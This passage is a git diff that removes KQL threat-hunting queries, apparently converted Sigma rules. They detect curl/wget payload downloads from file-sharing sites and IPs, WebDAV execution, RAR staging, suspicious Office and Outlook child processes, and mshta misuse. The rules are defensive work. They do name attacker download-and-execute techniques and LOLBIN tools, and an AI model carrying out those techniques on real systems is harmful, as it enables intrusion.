-| where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql b/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql
deleted file mode 100644
index 7514d439..00000000
--- a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects potentially suspicious file download from file sharing domains using curl.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io")
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql b/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql
deleted file mode 100644
index bdaf9ef9..00000000
--- a/Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects potentially suspicious file downloads from file sharing domains using wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io")
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql b/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql
deleted file mode 100644
index e3c7add6..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses using curl.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql b/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql
deleted file mode 100644
index 4a82ac5a..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses using Wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs'" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".psm1\"") and (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql b/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql
deleted file mode 100644
index b0c196f8..00000000
--- a/Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/23
-// Level: high
-// Description: Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-O\\s" or ProcessCommandLine contains "--output-document") and ProcessCommandLine contains "http" and (FolderPath endswith "\\wget.exe" or ProcessVersionInfoOriginalFileName =~ "wget.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Help\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\"))
\ No newline at end of file
diff --git a/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql b/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql
deleted file mode 100644
index b434440a..00000000
--- a/Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/09/01
-// Level: high
-// Description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " net use http" and ProcessCommandLine contains "& start /b " and ProcessCommandLine contains "\\DavWWWRoot\\") and (ProcessCommandLine contains ".exe " or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".bat " or ProcessCommandLine contains ".vbs " or ProcessCommandLine contains ".ps1 ") and (FolderPath contains "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.EXE")
\ No newline at end of file
diff --git a/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql b/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql
deleted file mode 100644
index 3dac4b9b..00000000
--- a/Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/12/15
-// Level: high
-// Description: Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rar.exe" or ProcessVersionInfoFileDescription =~ "Command line RAR") or (ProcessCommandLine contains ".exe a " or ProcessCommandLine contains " a -m")) and ((ProcessCommandLine contains " -hp" and ProcessCommandLine contains " -r ") and ((ProcessCommandLine contains " " and ProcessCommandLine contains ":*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\*.") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\$Recycle.bin\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\PerfLogs\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Temp") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Users\\Public\\") or (ProcessCommandLine contains " " and ProcessCommandLine contains ":\\Windows\\") or ProcessCommandLine contains " %public%"))
\ No newline at end of file
diff --git a/Execution/Suspicious_HH.EXE_Execution.kql b/Execution/Suspicious_HH.EXE_Execution.kql
deleted file mode 100644
index cd21df94..00000000
--- a/Execution/Suspicious_HH.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxim Pavlunin
-// Date: 2020/04/01
-// Level: high
-// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
-// Tags: attack.defense_evasion, attack.execution, attack.initial_access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\")
\ No newline at end of file
diff --git a/Execution/Suspicious_HWP_Sub_Processes.kql b/Execution/Suspicious_HWP_Sub_Processes.kql
deleted file mode 100644
index 7c00588f..00000000
--- a/Execution/Suspicious_HWP_Sub_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/24
-// Level: high
-// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
-// Tags: attack.initial_access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
-DeviceProcessEvents
-| where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql b/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql
deleted file mode 100644
index 54c067e6..00000000
--- a/Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/07
-// Level: high
-// Description: Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context
-// Tags: attack.execution, attack.t1059.001
-DeviceFileEvents
-| where FolderPath in~ ("C:\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt", "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-Interactive")
\ No newline at end of file
diff --git a/Execution/Suspicious_LOLBIN_AccCheckConsole.kql b/Execution/Suspicious_LOLBIN_AccCheckConsole.kql
deleted file mode 100644
index 83a2f028..00000000
--- a/Execution/Suspicious_LOLBIN_AccCheckConsole.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/06
-// Level: high
-// Description: Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -window " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\AccCheckConsole.exe" or ProcessVersionInfoOriginalFileName =~ "AccCheckConsole.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_Microsoft_Office_Child_Process.kql b/Execution/Suspicious_Microsoft_Office_Child_Process.kql
deleted file mode 100644
index 255e5e51..00000000
--- a/Execution/Suspicious_Microsoft_Office_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
-// Date: 2018/04/06
-// Level: high
-// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)
-// Tags: attack.defense_evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\"))
\ No newline at end of file
diff --git a/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql b/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql
deleted file mode 100644
index 37f7d4d5..00000000
--- a/Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location
-Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on
-Instead they modify the task after creation to include their malicious payload
-
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /Change " and ProcessCommandLine contains " /TN ") and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "bash.exe" or ProcessCommandLine contains "bash " or ProcessCommandLine contains "scrcons" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "forfiles" or ProcessCommandLine contains "scriptrunner" or ProcessCommandLine contains "hh.exe" or ProcessCommandLine contains "hh ") and (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Perflogs\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%")
\ No newline at end of file
diff --git a/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql b/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql
deleted file mode 100644
index 796ce58d..00000000
--- a/Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/07/17
-// Level: high
-// Description: Detects suspicious mshta process execution patterns
-// Tags: attack.execution, attack.t1106
-DeviceProcessEvents
-| where ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and ((ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\Public\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))) or ((FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") and (not(((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\") or (ProcessCommandLine contains ".htm" or ProcessCommandLine contains ".hta") or (ProcessCommandLine endswith "mshta.exe" or ProcessCommandLine endswith "mshta")))))
\ No newline at end of file
diff --git a/Execution/Suspicious_Outlook_Child_Process.kql b/Execution/Suspicious_Outlook_Child_Process.kql
deleted file mode 100644
index 7dd75aaa..00000000
--- a/Execution/Suspicious_Outlook_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
-// Date: 2022/02/28
-// Level: high
-// Description: Detects a suspicious process spawning from an Outlook process.
-// Tags: attack.execution, attack.t1204.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"
\ No newline at end of file
diff --git a/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 504899dd..00000000
--- a/Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql b/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql
deleted file mode 100644
index 047e80a5..00000000
--- a/Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/28
-// Level: high
-// Description: Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
